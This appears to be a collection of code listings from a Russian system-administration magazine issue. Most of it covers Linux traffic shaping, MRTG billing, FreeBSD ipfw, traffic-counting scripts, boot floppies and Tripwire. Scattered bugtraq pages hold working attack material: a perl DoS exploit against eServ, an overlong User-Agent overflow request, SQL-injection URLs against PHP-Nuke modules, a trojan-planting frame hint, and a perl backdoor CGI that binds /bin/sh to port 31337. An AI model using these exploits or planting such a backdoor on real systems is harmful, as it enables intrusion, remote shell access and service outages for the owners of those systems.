Листинг №7(8)
bugtraq стр. 2
e@some_host$ telnet hostname 80
Connected to hostname at 80
GET /board/index.php HTTP/1.0
User-Agent:
callto:msils/
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+type=directory
Cтатическая маршрутизацияв Linux. iproute2
Часть 2
Всеволод Стахов
tc qdisc [add | change | replace | del | link] dev DEV [parent qdisc-id | root] [handle qdisc-id] queue-type [qdisc specific parameters]
tc class [add | change | replace | del] dev DEV parent qdisc-id [classid class-id] queue-type [qdisc specific parameters]
tc filter [add | change | replace | del] dev DEV [parent qdisc-id | root] protocol protocol prio priority filter-type [filtertype specific parameters] flowid flow-id
tc qdisc add dev eth0 root handle 1: classful-queue [parameters]
tc qdisc add dev eth0 parent 1: handle 10: queue-type [parameters]
tc qdisc add dev eth0 parent 1: handle 20: queue-type [parameters]
# tc qdisc del dev eth0 root handle 1: queue-type
# tc qdisc add dev ppp0 root tbf rate 220kbit latency 50ms burst 1500
# tc qdisc add dev eth0 root sfq pertrub 10
# tc qdisc add dev eth0 root pfifo limit 500
TOS № полосы
Максимальная надежность – 1
Минимальная цена – 2
Максимальная пропускная способность – 2
Минимальная задержка (интерактивный) – 1
# tc qdisc add dev eth0 root handle 1: prio
# tc qdisc add dev eth0 parent 1:1 handle 10: sfq pertrub 10
# tc qdisc add dev eth0 parent 1:2 handle 20: tbf rate 1mbit buffer 15000 latency 10ms
# tc qdisc add dev eth0 parent 1:3 handle 30: sfq pertrub 10
Клиент Сервис Полоса пропускания
A smtp 2mbit
A www 3mbit
B all 1mbit
other all 2mbit
# tc qdisc add dev eth0 root handle 1: htb default 13
tc class add dev eth0 parent 1: classid 1:1 htb rate 9mbit ceil 9mbit burst 12500
tc class add dev eth0 parent 1:1 classid 1:10 htb rate 2mbit ceil 9mbit burst 12500
tc class add dev eth0 parent 1:1 classid 1:11 htb rate 3mbit ceil 9mbit burst 12500
tc class add dev eth0 parent 1:1 classid 1:12 htb rate 1mbit ceil 9mbit burst 12500
tc class add dev eth0 parent 1:1 classid 1:13 htb rate 3mbit ceil 9mbit burst 12500
# tc filter add dev eth0 protocol ip parent 1:0 prio 1 u32 match ip src A_ip match ip dport 80 0xffff flowid 1:10
# tc filter add dev eth0 protocol ip parent 1:0 prio 1 u32 match ip src A_ip match ip dport 25 0xfff flowid 1:11
# tc filter add dev eth0 protocol ip parent 1:0 prio 1 u32 match ip src B_ip flowid 1:12
# tc filter add dev eth0 protocol ip parent 1:0 prio 2 flowid some_band
# iptables -A FORWARD -t mangle -i eth0 -j MARK --set-mark 6
# tc filter add dev eth0 ptrotocol ip parent 1:0 prio 1 handle 6 fw classid 1:1
# ip route add some_network via some_gate dev eth0 realm 2
# tc filter add dev eth0 parent 1:0 protocol ip prio 1 route to 2
# tc qdisc add dev eth0 parent 1:10 handle 20: pfifo limit 500
# tc qdisc add dev eth0 parent 1:11 handle 30: pfifo limit 500
# tc qdisc add dev eth0 parent 1:12 handle 40: pfifo limit 500
# tc qdisc add dev eth0 parent 1:13 handle 50: sfq perturb 10
# tc qdisc add dev eth1 root teql0
# tc qdisc add dev eth2 root teql0
# ip link set dev teql0 up
Server A
# ip addr add dev eth1 10.0.0.1/31
# ip addr add dev eth2 10.0.0.3/31
# ip addr add dev teql0 10.0.0.5/31
Server B
# ip addr add dev eth1 10.0.0.2/31
# ip addr add dev eth2 10.0.0.4/31
# ip addr add dev teql0 10.0.0.6/31
# echo 0 > /proc/sys/net/ipv4/conf/eth1/rp_filter
# echo 0 > /proc/sys/net/ipv4/conf/eth2/rp_filter
# tc qdisc add dev eth0 root handle 1: default 14
# tc class add dev eth0 parent 1: handle 1:1 rate 10mbit burst 150000 ceil 100mbit
# tc class add dev eth0 parent 1:1 handle 1:11 rate 10mbit burst 15000 ceil 100mbit prio 2
# tc class add dev eth0 parent 1:1 handle 1:12 rate 10mbit burst 15000 ceil 100mbit prio 2
# tc class add dev eth0 parent 1:1 handle 1:13 rate 10mbit burst 15000 ceil 100mbit prio 2
# tc class add dev eth0 parent 1:1 handle 1:14 rate 69mbit burst 100000 ceil 100mbit prio 3
# tc class add dev eth0 parent 1:1 handle 1:15 rate 100kbit burst 1000 ceil 100mbit prio 4
# tc class add dev eth0 parent 1:1 handle 1:16 rate 900kbit burst 2500 ceil 100mbit prio 1
# tc filter add dev eth0 protocol ip parent 1:0 prio 1 u32 match ip src 192.168.2.2 match ip dport 110 0xffff flowid 1:11
# tc filter add dev eth0 protocol ip parent 1:0 prio 1 u32 match ip src 192.168.2.2 match ip dport 138 0xfff flowid 1:11
# tc filter add dev eth0 protocol ip parent 1:0 prio 1 u32 match ip src 192.168.2.3 match ip dport 110 0xffff flowid 1:12
# tc filter add dev eth0 protocol ip parent 1:0 prio 1 u32 match ip src 192.168.2.3 match ip dport 138 0xfffflowid 1:12
# tc filter add dev eth0 protocol ip parent 1:0 prio 1 u32 match ip dport 22 0xffff flowid 1:13
# iptables -A PREROUTING -i eth0 -t mangle -p tcp --syn -j MARK --set-mark 1
# tc qdisc add dev eth0 handle ffff: ingress
# tc filter add dev eth0 parent ffff: protocol ip prio 50 handle 1 fw police rate 100kbit burst 1500 mtu 9k drop flowid :1
# tc filter add dev eth0 parent 10:0 protocol ip prio 100 u32 match ip protocol 1 0xff flowid 1:15
# tc filter add dev eth0 parent 1: protocol ip prio 10 u32 match ip protocol 6 0xff match u8 0x05 0x0f at 0 match u16 0x0000 0xffc0 at 2 match u8 0x10 0xff at 33 flowid 1:15
# tc qdisc add dev eth0 parent 1:11 handle 20: pfifo limit 500
# tc qdisc add dev eth0 parent 1:12 handle 30: pfifo limit 500
# tc qdisc add dev eth0 parent 1:13 handle 40: sfq pertrub 10
# tc qdisc add dev eth0 parent 1:14 handle 50: pfifo_fast
# tc qdisc add dev eth0 parent 1:15 handle 60: pfifo limit 15
bugtraq стр. 13
FRAME SRC="C:\winnt\welcome.exe">
... together around 191 ... and after comes our trojan ...
bugtraq стр. 19
Утечка памяти большим количеством подключений в eServ
Отказ в обслуживании обнаружен в eServ. Утечка памяти позволяет удаленному пользователю исчерпать доступные системные ресурсы на целевом сервере.
Сообщается, что удаленный пользователь может подключиться к серверу несколько тысяч раз, чтобы заставить сервер выделить большое количество памяти, что в конечном счете приведет к зависанию сервера. Сообщается, что 100 подключений может вызвать утечку памяти между 7.81 MB и 31.25 MB, а 50.000 подключений приведут к аварийному завершению работы сервера. Эксплоит:
#!/usr/bin/perl
#LEGAL NOTICE: Don't test this on networks you don't
#administer, and do not test this tool on networks you don't
#own without permission of the network owner. You are
#responsible for all damage due to your use of this tool.
use IO::Socket;
print "$0: eServ Remote DoS Exploit\r\n";
print "By Matthew Murphy \\r\n\r\n";
print "Server hostname\: ";
$host = trim(chomp($line = ));
print "Service port to probe\: ";
$port = trim(chomp($line = ));
print "\r\nBeginning probe -- stop with CTRL+C\r\n";
while (1) {
$f = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host:$port");
undef $f;
$ telnet ipp
POST /printers/ HTTP/1.1
Учет трафика с помощью программ MRTG и LAN Billing
Денис Колисниченко
rpm -ih mrtg*
cfgmaker --global 'WorkDir: /var/www/html/mrtg' \
--global 'Options[_]: bits,growright' \
--output /var/www/html/mrtg/mrtg.cfg \
community@router
WorkDir: /var/www/html/mrtg
Options[_]: bits,growright
Target[r1]: community@router
Target[r1]: 1:community@router
Target[r2]: 2:community@router
MaxBytes[r1]: 1250000
MaxBytes[r2]: 2500000
Title[r1]: Traffic Analysis for first interface
PageTop[r1]: Stats for our interface #1
Title[r2]: Traffic Analysis for second interface
PageTop[r2]: Stats for our interface #2
Target[r3]: `/usr/bin/program`
Options[_]: bits, perminute, noinfo
Листинг 1. Программа count
#!/bin/bash
# (c) 2002 Denis Kolisnichenko
# Usage: /usr/bin/count iface
/bin/grep "$1" /proc/net/dev | /bin/awk -F ":" '{ print $2 }' | /bin/awk '{ print $1 "\n" $9 }'
UPTIME=`/usr/bin/uptime | /bin/awk -F " " '{ print $3 }'`
echo $UPTIME
echo $1
/usr/bin/count интерфейс
count eth0
2738410
1235960
2:57,
eth0
Листинг 2. Файл /var/www/html/mrtg/mrtg.cfg
Target[eth0]: `/usr/bin/count eth0`
WorkDir: /var/www/html/mrtg/ipc
Options[eth0]: nopercent,growright,noinfo,gauge
Title[eth0]: eth0 Traffic
PageTop[eth0]: eth0 Traffic
MaxBytes[eth0]: 99999999
kilo[eth0]: 1024
YLegend[eth0]: bytes
ShortLegend[eth0]: bytes
LegendO[eth0]: eth0 Traffic :
LegendI[eth0]: eth0 Traffic :
Legend1[eth0]: eth1 Traffic in bytes
Target[ppp0]: `/usr/bin/count ppp0`
WorkDir: /var/www/html/mrtg/ipc
Options[ppp0]: nopercent,growright,noinfo,gauge
Title[ppp0]: ppp0 Leased Line
PageTop[ppp0]: ppp0 Leased Line
MaxBytes[ppp0]: 99999999
kilo[ppp0]: 1024
YLegend[ppp0]: bytes
ShortLegend[ppp0]: bytes
LegendO[ppp0]: ppp0 Traffic :
LegendI[ppp0]: ppp0 Traffic :
Legend1[ppp0]: ppp0 Traffic in bytes
mrtg /var/www/html/mrtg/mrtg.cfg
5,10,15,20,25,30,35,40,45,50,55,59 * * * * root /usr/bin/mrtg /var/www/html/mrtg/mrtg.cfg
0-59/5 * * * * root /usr/bin/mrtg /var/www/html/mrtg/mrtg.cfg
/etc/init.d/crond restart
serverextip=193.111.111.1
writemode=db
serveraddress=192.168.0.1
mysqluser=sqluser
mysqlpassword=qwerty123456
mysqldatabase=nfbilling
logfile=/var/log/nfbilling/nfbilling.log
segment=192.168.0.0 255.255.255.0
actuality=100
minter=100
flush=600
fdelay=60
dumpfile=/var/log/nfbilling/nfbcd-dump
devide=ppp0
ignoremask=255.255.255.255
ignorenet=127.0.0.0 255.0.0.0
duser=nobody
dgroup=nobody
dport=7223
killall –HUP nfbcd
killall –HUP nfbccd
/etc/rc.d/init.d/nfbilling.init restart
/etc/rc.d/init.d/nfbilling.init start
/etc/rc.d/init.d/nfbilling.init stop
http://ваш_web_сервер/analyze.php
Ipfw и управление трафиком в FreeBSD
Игорь Чубин
# ipfw list
00100 deny ip from 10.0.0.2 to any
65535 allow ip from any to any
# ipfw действие [ число ] [ правило ]
# ipfw add deny ip from 10.0.0.3 to any
# ipfw add 100 deny ip from 10.0.0.3 to any
[ число ] [ set число ] [ prob вероятность ] действие [ log ] тело
[ число ] действие тело
allow from any to any
# kldload ipfw
# ipfw -q flush
# ipfw -q flush && ipfw add 65000 allow ip from any to any
# ipfw add 100 allow ip from any to any via lo0
# ipfw add 200 deny ip from any to 127.0.0.0/8
# ipfw add 300 deny ip from 127.0.0.0/8 to any
# ipfw add deny from any to 10.0.0.0/8 via ${external}
# ipfw add deny from any to 172.16.0.0/12 via ${external}
# ipfw add deny from any to 192.168.0.0/16 via ${external}
# ipfw add deny from 10.0.0.0/8 to any via ${external}
# ipfw add deny from 172.16.0.0/12 to any via ${external}
# ipfw add deny from 192.168.0.0/16 to any via ${external}
# ipfw add 2000 allow tcp from any to ${external} 22,25,80 setup
# ipfw add 2100 allow tcp from any to any established
# ipfw add 3000 allow tcp from ${external} to any setup
# ipfw add 4000 allow udp from ${external} to any 53
# ipfw add 4100 allow udp from any 53 to ${external}
# ipfw add 5000 deny icmp from any to ${external} in icmptypes 8
# ipfw add 5100 allow icmp from ${external} to any out icmtypes 8
# ipfw add 5200 allow icmp from any to ${external} in icmptypes 0
# ipfw add 64000 deny ip from any to any
# ipfw add divert 8868 tcp from 192.168.15.0/24 to any via ${natd_interface}
# ipfw add divert 8868 tcp from any to any via ${natd_interface}
# natd -interface xl0
# natd -f /etc/natd.conf
interface xl0
interface ${external}
proxy_rule port 80 server ${proxy}:3128
redirect_port tcp ${mailhub}:25 25
# ipfw add pipe 1 tcp from any to 192.168.15.1 out
# ipfw pipe 1 bw 10KB
# ipfw pipe 1 list
# ipfw -a list
65535 4386 844198 allow ip from any to any
# ipfw add count ip from 192.168.15.0/24 to any
options IPFIREWALL
options IPFIREWALL_VERBOSE
options IPFIREWALL_VERBOSE_LIMIT=10
options IPFIREWALL_DEFAULT_TO_ACCEPT
options DUMMYNET
options IPDIVERT
# /usr/sbin/config ВАШЕ_ЯДРО
# cd ../compile/ВАШЕ_ЯДРО
# cd ../../compile/ВАШЕ_ЯДРО
# make depend
# make
# make install
add deny icmp from any to any
add deny ip from 1.2.3.4 to any
allow tcp from any to any established
natd_enable="YES"
natd_inteface="lnc0"
natd_flags="-f /etc/natd.conf"
# sh /etc/rc.conf /etc/rc.firewall
Bugtraq стр. 35
GET /? HTTP/1.1
Скрипты для подсчета трафика: пример реализации в FreeBSD
Денис Пеплин
user1 192.168.0.11
user2 192.168.0.123
...
+ user3 192.168.0.98
- user2 192.168.0.123
...
Data store user group 76905 buhgalter (192.168.0.3)ї
Fri Apr 11 15:25:38 2003
76905 DENY_WRITE 0x20089 RDONLY EXCLUSIVE+BATCH ї
/pub/file.txt Thu Apr 11 17:30:46 2003
#!/bin/sh
smbstatus | grep -E "([0-9]{1,3}\.){3}[0-9]{1,3}" \
| colrm 1 13 | grep -v -E "^nobody|^root" \
| awk '{printf(" %s %s\n",$1,$5)}' \
| sort | uniq | sed 's/[()]//g'
#!/bin/sh
count_list="samba pppd"
sleeptime=20
TMPDIR="/var/tmp"
export TMPDIR
tmpfile=`mktemp -q -u -t count` || exit 1
cleanup ()
{
rm -f $tmpfile.?
}
trap : 1
trap : 2
trap : 15
set -T
trap "cleanup; exit" 1 2 15
bindir=$(dirname $0) || exit 1
count_eval=""
for progname in $count_list
do
if [ $count_eval ] ; then
count_eval="$count_eval ; $bindir/count_$progname"
else
count_eval="$bindir/count_$progname"
fi
done
count_num=0
touch $tmpfile.$count_num
while [ ! ]
do
if ! ps $PPID >/dev/null 2>&1
then
echo "Parent process died. Cleanup and exit." >&2
break
fi
count_old=$count_num
test $count_num -eq 1
count_num=$?
eval $count_eval | tee $tmpfile.$count_num \
| diff -b -u $tmpfile.$count_old - \
| grep "^[+-] [a-z]" | sort -r
sleep $sleeptime
done
cleanup
#!/bin/sh
who | awk '{if(substr($2,1,4)=="cuaa")ї
printf("%s %s\n",$1,$2)}' | while read user ttyname
do
grep ":" /etc/ppp/options.$ttyname \
| awk -F: '{printf(" %s %s\n",user,$2)}' user=$user
done
rule username {
ipfw = 32001
}
#!/bin/sh
bindir=$(dirname $0) || exit 1
connect="$bindir/count_user"
#connect="$bindir/count_client 192.168.0.1 27777"
count_fw=ipfw
count_prog=ipa
count_startnum=32000
logfile="/var/log/utcount.log"
export count_startnum
if [ -f /var/run/count.pid ] && ps `cat /var/run/count.pid` >/dev/null 2>&1
then
echo "Another count process already run. Stop it and try again." >&2
exit 1
fi
trap : 1
trap : 2
trap : 15
set -T
trap "rm -f /var/run/count.pid; exit" 1 2 1
echo -n $$ > /var/run/count.pid || exit 1
$connect | while read action username address
do
if echo "$action $username $address" \
| grep -E -v -q "^[+-] [a-z].* ([0-9]{1,3}\.){3}[0-9]{1,3}$"
then
continue
fi
usernum=`$bindir/count_$count_prog $action $username`
$bindir/count_$count_fw $action $usernum $address
echo "[`date '+%d.%m.%y %H:%M'`] $action $username $address $usernum" \
>> $logfile
done
include {
file(?) = /usr/local/etc/ipa.users
}
#!/bin/sh
ipa_users="/usr/local/etc/ipa.users"
username_prefix="_"
action=$1 ; username=$2
ipa_add_user ()
{
username=$1 ; usernum=$2
printf "rule $username_prefix$username {\n\tipfw = $usernum\n}\n" \
>> $ipa_users
if [ -r /var/run/ipa.pid ] ; then
kill -HUP `cat /var/run/ipa.pid` >/dev/null 2>&1
sleep 5
fi
}
if [ -f $ipa_users ] ; then
startline=`grep -n "^rule $username_prefix$username " $ipa_users \
| awk -F: '{print $1}'`
if [ $startline ] ; then
usernum=`head -n $(expr $startline + 1) $ipa_users \
| tail -n 1 | awk -F= '{print $2}'`
else
usernum=`expr $count_startnum + $(wc -l < $ipa_users) / 3 + 1`
ipa_add_user $username $usernum
fi
else
usernum=`expr $count_startnum + 1`
ipa_add_user $username $usernum
fi
if [ "$action" = "-" ] ; then
/usr/local/sbin/ipa -k dump >/dev/null 2>&1
fi
echo $usernum
firewall_enable="YES"
firewall_type="OPEN"
# ipfw show
00100 0 0 allow ip from any to any via lo0
00200 0 0 deny ip from any to 127.0.0.0/8
00300 0 0 deny ip from 127.0.0.0/8 to any
65000 0 0 allow ip from any to any
65535 0 0 deny ip from any to any
#!/bin/sh
fwcmd="/sbin/ipfw"
usernum=$2 ; address=$3
case $1 in
+)
action=add
if ! $fwcmd show $count_startnum >/dev/null 2>&1 ; then
$fwcmd $action $count_startnum allow ip from me to any
fi
if ! $fwcmd show $usernum 2>/dev/null | grep -q $address
then
$fwcmd $action $usernum count ip from any to $address
fi
;;
-)
action=delete
$fwcmd $action $usernum count ip from any to $address
;;
*)
exit 1
;;
esac
00100 0 0 allow ip from any to any via lo0
00200 0 0 deny ip from any to 127.0.0.0/8
00300 0 0 deny ip from 127.0.0.0/8 to any
32000 0 0 allow ip from me to any
32001 0 0 count ip from any to 192.168.0.167
32002 0 0 count ip from any to 192.168.0.174
65000 0 0 allow ip from any to any
65535 0 0 deny ip from any to any
60000 0 0 deny ip from any to 192.168.0.0/24
---------------------------
| samba, pppd, ... | user | --> +/- user address -->
---------------------------
---------------------
| gate | ipfw + ipa |
---------------------
count 27777/tcp
count stream tcp nowait ї
nobody /usr/local/bin/count_user count
global {
maxchunk = 1G
update_db_time = 1m
append_db_time = 30m
}
include {
file(?) = /usr/local/etc/ipa.users
}
Bugtraq стр. 43
'secid' в модуле Sections
'sid' в модуле AvantGo
'pollID' в модуле Surveys
'cid' в модуле Downloads
'id' в модуле Reviews
'cid' в модуле Web_Links
http://[target]/modules.php?name=Sections&op=listarticles&secid=`[YOUR QUERY]
http://[target]/modules.php?name=Sections&op=viewarticle&artid=`[YOUR QUERY]
http://[target]/modules.php?name=Sections&op=printpage&artid==`[YOUR QUERY]
http://[target]/modules.php?name=AvantGo&file=print&sid=`[YOUR QUERY]
http://[target]/modules.php?name=Surveys&pollID=`[YOUR QUERY]
http://[target]/modules.php?name=Surveys&op=results&pollID=`[YOUR QUERY]&mode=&order=0&thold=0
http://[target]/modules.php?name=Downloads&d_op=viewdownload&cid=` [YOUR QUERY]
http://[target]/modules.php?name=Downloads&d_op=viewdownload&cid=`[YOUR QUERY]&orderby=titleD
http://[target]/modules.php?name=Reviews&rop=showcontent&id=` [YOUR QUERY]
http://[target]/modules.php?name=Web_Links&l_op=viewlink&cid=`[YOUR QUERY]
http://[target]/modules.php?name=Web_Links&l_op=MostPopular&ratenum=`[YOUR QUERY]&ratetype=num
http://[target]/modules.php?name=Downloads&ratinglid=[FILE TO RATE]&
http://[target]/modules.php?name=Web_Links&ratinglid=96&ratinguser=?
&ratinghost_name=?&rating=99999999999999999999999 9999999999
http://[target]/modules.php?name=Downloads&ratinglid=[FILE TO RATE]&ratinguser=?
&ratinghost_name=?&rating=9999999999999999999
9999999999999999999999999999999999999999999999999999
#include
#include
#include
int main(int argc, char **argv)
if (argc < 2) {
(void) fprintf(stderr, "Usage: %s PORT [VALUE]\n", argv[0]);
return (2);
}
if (ioperm(1023, 1, 0) == -1) {
perror("ioperm");
return (1);
}
if (argc < 3) {
(void) printf("0x%02x\n", inb(atoi(argv[1])));
} else {
outb(atoi(argv[2]), atoi(argv[1]));
}
return (0);
Создание загрузочных дискет и CD-дисков Linux
Всеволод Стахов
# mke2fs -N 300 /dev/fd0
# mount -t ext2fs -o rw /dev/fd0 /mnt/tmp
# cp $KERNELSRC/arch/i386/boot/bzImage /mnt/tmp/vmlinuz
# umount /dev/fd0
/tmp/lilo.conf.tmp
boot=/dev/fd0
prompt
timeout=50
compact
vga=normal
read-only
menu-title=" NFS-distributive "
image=/vmlinuz
label=linux
append="root=/dev/nfs nfsroot=192.168.1.1:/exports/debian ip=::::nfs-client::bootp"
nfsroot=[:][,]
ip=::::: :
ip=192.168.1.102:192.168.1.1:192.168.1.1:255.255.255.0: print-server:eth0:
host hostname{
[parameters]
}
/exports/debian nfs-client(rw,no_root_squash)
# rpc.mountd
# rpc.nfsd
# rpcinfo -p
# showmount --export
# mount -t ext2 /dev/fd0 /mnt/tmp
# mkdir /mnt/tmp/boot
# cp /boot/boot.b /mnt/tmp/boot
# cp /tmp/lilo.conf.tmp /mnt/tmp/lilo.conf
# /sbin/lilo -v -C /mnt/tmp/lilo.conf -r /mnt/tmp
...cut...
image=/vmlinuz
...cut...
password="my_password"
mandatory
# dd if=/dev/zero of=/tmp/initrd.img bs=1024 count=3072
# mke2fs -N 360 -m 0 /tmp/initrd.img
# mount -t ext2 -o loop /mnt/tmp /tmp/initrd.img
# cp -dpR /dev/tty[0-6] /mnt/tmp/dev
# cp -dpR /dev/fd0* /mnt/tmp/dev
# cp -dpR /dev/console /mnt/tmp/dev
# cp -dpR /dev/kmem /mnt/tmp/dev
/etc/passwd
root::0:0:root:/root:/bin/sh
daemon:*:1:1:daemon:/sbin:/bin/sh
bin:*:2:2:bin:/bin:/bin/sh
sys:*:3:3:sys:/dev:/bin/sh
sync:*:4:100:sync:/bin:/bin/sync
games:*:5:100:games:/usr/games:/bin/sh
man:*:6:100:man:/var/cache/man:/bin/sh
lp:*:7:7:lp:/var/spool/lpd:/bin/sh
mail:*:8:8:mail:/var/mail:/bin/sh
/etc/fstab
/dev/ram0 / ext2 defaults 0 1
proc /proc proc defaults 0 0
/etc/inittab
# Runlevel по умолчанию:
id:2:initdefault:
# Путь к инициализационному скрипту:
si::sysinit:/etc/rc
# Запуск /sbin/getty для виртуальных консолей (в данном
# примере 3, но может быть и больше, только учтите,
# что устройства ttyX должны находиться в каталоге
# /dev ram-диска):
1:2345:respawn:/sbin/getty 9600 tty1 linux
2:23:respawn:/sbin/getty 9600 tty2 linux
3:23:respawn:/sbin/getty 9600 tty3 linux
# Перезагрузка при нажатии клавиш Ctrl+Alt+Del:
ca:12345:ctrlaltdel:/sbin/shutdown -t1 -a -r now
/etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
tty:x:5:
disk:x:6:
lp:x:7:lp
mail:x:8:
/etc/nsswitch.conf
passwd: files
shadow: files
group: files
hosts: files
networks: files
protocols: files
services: files
/etc/pam.conf
OTHER auth optional /lib/security/pam_permit.so
OTHER account optional /lib/security/pam_permit.so
OTHER password optional /lib/security/pam_permit.so
OTHER session optional /lib/security/pam_permit.so
/etc/rc
#!/bin/sh
# Устанавливаем переменные среды:
PATH=/bin:/sbin:/usr/bin:/usr/sbin
# Монтируем файловые системы:
/bin/mount -av
# Устанавливаем имя хоста:
/bin/hostname floppy-dist
# Настраиваем и запускаем сетевой интерфейс (если это нужно):
/sbin/ifconfig eth0 192.168.1.1 netmask 255.255.255.0 broadcast 192.168.1.255
/sbin/ifconfig eth0 up
# Настраиваем маршрутизацию:
/sbin/route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
# Далее могут быть другие команды, в зависимости от
# назначения дистрибутива
export PATH
# chmod +x /mnt/tmp/etc/rc
# mkdir -p /mnt/tmp/etc/terminfo/l
# cp /etc/terminfo/l/linux /mnt/tmp/etc/terminfo/l/linux
# cd /mnt/tmp
# ln -s bin/busybox bin/cd
# ln -s bin/busybox bin/ls
# make PREFIX=/mnt/tmp install
(debian:/etc)# ldd /sbin/init
libc.so.6 => /lib/libc.so.6 (0x4001d000)
/lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
# mkdir -p /mnt/tmp/var/{log,run}
# touch /mnt/tmp/var/run/utmp
# ldconfig -r /mnt/tmp
# umount /mnt/tmp
# gzip -c9 /tmp/initrd.img > ~/initrd.gz
# rm -f /tmp/initrd.img
# dd if=/usr/src/linux/arch/i386/boot/bzImage of=/dev/fd0 bs=1k
384+1 прочитано блоков
384+1 записано блоков
# rdev /dev/fd0 /dev/fd0
# rdev -R /dev/fd0
# rdev -r /dev/fd0 `expr 16384 + 385`
# rdev -r /dev/fd0 16769
# dd if=~/initrd.gz of=/dev/fd0 bs=1k seek=385
# fdformat -n /dev/fd0
# badblocks /dev/fd0 > /tmp/fd0.bad
# mkfs.msdos -l /tmp/fd0.bad -n boot /dev/fd0
# syslinux /dev/fd0
# mount /dev/fd0 /floppy
# cp /usr/src/linux/arch/i386/boot/bzImage /floppy/vmlinuz
# cp ~/initrd.gz /floppy/
# vi /floppy/syslinux.cfg
syslinux.cfg:
default linux
prompt 1
label linux
kernel vmlinuz
append initrd=initrd.gz
label метка
kernel файл_ядра
append опции_ядра
# cp /dev/fd0 /cd-iso/boot/boot.img
# cd /cd-iso
# mkisofs -r -b boot/boot.img -c boot/boot.catalog -o bootcd.iso ./
# mount -t iso9660 -o ro,exec /dev/hd[b] /usr
/dev/hdb / is09660 ro,exec 0 0
# cdrecord -v speed=8 dev=0,0,0 /cd-iso/bootcd.iso
Виртуальный компьютер
Денис Колисниченко
rpm –ihv VMware-workstation-3.2.0-2230.i386.rpm
Контрольная сумма на защите Linux/FreeBSD
Сергей Яремчук
$ md5sum mysql-max-3.23.55-unknown-freebsd4.7-i386.tar.gz
99b543fbe12c2980c66d365ca68e819b
$ more Makefile | grep MAINTAINER
MAINTAINER= anarcat@anarcat.dyndns.org
$ cd /usr/ports/security/tripwire
$ make install clean
make all
make *_r(d )
# /usr/sbin/tripwire--init
### Filename: /bin/ash
### No such file or directory
### Continuing...
### Warning: File system error.
### Filename: /bin/ash.static
### No such file or directory
### Continuing...
$ make install TRIPWIRE_FLOPPY= YES
$ make floppy
$ tripwire --check --email-report
$ tripwire --test --email user@domain.com
$ tripwire --check object1 object2 object3
# tripwire --check --severity 66
# tripwire --check --rulename "File System and Disk Administraton Programs"
$tripwire --update
$ tripwire --update /usr/sbin/sshd
# tripwire --check --twrfile /var/lib/report/myreport.twr
# twprint --print-report --report-level 1 --twrfile /var/lib/report/report.twr
# twadmin –print-cfgfile > /etc/tripwire/twcfg.txt
# twadmin --create-cfgfile --site-keyfile /etc/tripwire/site.key /etc/tripwire/twcfg.txt
-----
Врез про уровни
TWReport LIGHTHOUSE 19991021134026 V:45 S:100 A:2 R:1 C:6
Added: /usr/bin/bash
Modified: /usr/bin
-----
# twadmin --print-polfile > /etc/tripwire/twpol.txt
# tripwire --update-policy /etc/tripwire/twpol.txt
# twadmin --examine file1 file2
# twadmin --remove-encryption file1 file2
# twadmin --generate-keys --local-keyfile /etc/tripwire/localkey.k
# twadmin --generate-keys --site-keyfile /etc/tripwire/sitekey.keyey
# twadmin --encrypt --local-keyfile /etc/tripwire/localkey.keyfile1 file2
# twadmin --encrypt --site-keyfile /etc/tripwire/sitekey.key file1 file2
# twprint --print-dbfile > db.txt
# twprint --print-dbfile --dbfile otherfile.twd > db.txt
# twprint --print-report --twrfile имя-файла-с-отчетом
# /usr/sbin/siggen /var/lib/tripwire/localhost.twd
----------------------------------------------------------
Signatures for file: /var/lib/tripwire/localhost.twd
CRC32 BVr6P8
MD5 CyDxlDF7Mnuz3njdkViXBB
SHA OQlEAmFhfbcDp8ExomcqkJ8HGNS
HAVAL BIR2NV6sOozXF9X92hqkyA
----------------------------------------------------------
object name -> property_mask [attribute=value …];
! object name;
"/te\x73t2"
/usr/lib -> $(ReadOnly) ( emailto = admin@foo.com ) ;
(attribute = value)
{
rule1;
rule2;
...
}
(emailto = admin1@foo.com, severity = 90)
{
/etc/dog-> +pingus (severity = 75);
/etc/cat-> $(Dynamic) (emailto = admin2@foo.com);
}
@@directive [arguments]
@@ifhost machine1 || machine2
/usr/bin -> +pinug ;
@@else
/usr/bin -> +pinugsmC ;
@@endif
bugtraq стр. 77
nc warlab.dk 25
220 win2k-serv ESMTP Server FTGate
HELO Foobar
250 win2k-serv
Mail From :
ISA Server: davinci.winmat.com
Via:
Перехват shell через YaBB
Виктор Игнатьев
test.cgi
backdoor.cgi
#!/usr/bin/perl -w
print "Content-Type: text/html\n\n";
system("ls > 1.txt");
#!/usr/bin/perl –w
use Socket;
$port = 31337;
socket (S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));
setsockopt (S, SOL_SOCKET, SO_REUSEADDR,1);
bind (S, sockaddr_in ($port, INADDR_ANY));
listen (S, 50);
while (1){
accept (X, S);
if (!($pid = fork)){
if(!defined $pid){exit(0);}
open STDIN,"<&X";
open STDOUT,">&X";
open STDERR,">&X";
exec("/bin/sh -i");
close X;}}
Settings.pl
$emailwelcome = 1;
# Set to 1 to email a welcome message to users even when
# you have mail password turned off
$mailprog = "/usr/sbin/sendmail";
# Location of your sendmail program
$smtp_server = "smtp.mysite.com";
# Address of your SMTP-Server
$webmaster_email = q^webmaster@mysite.com^;
# Your email address.
(eg: $webmaster_email = q^admin@host.com^;)
$mailtype = 0;
# Mail program to use: 0 = sendmail, 1 = SMTP, 2 = Net::SMTP
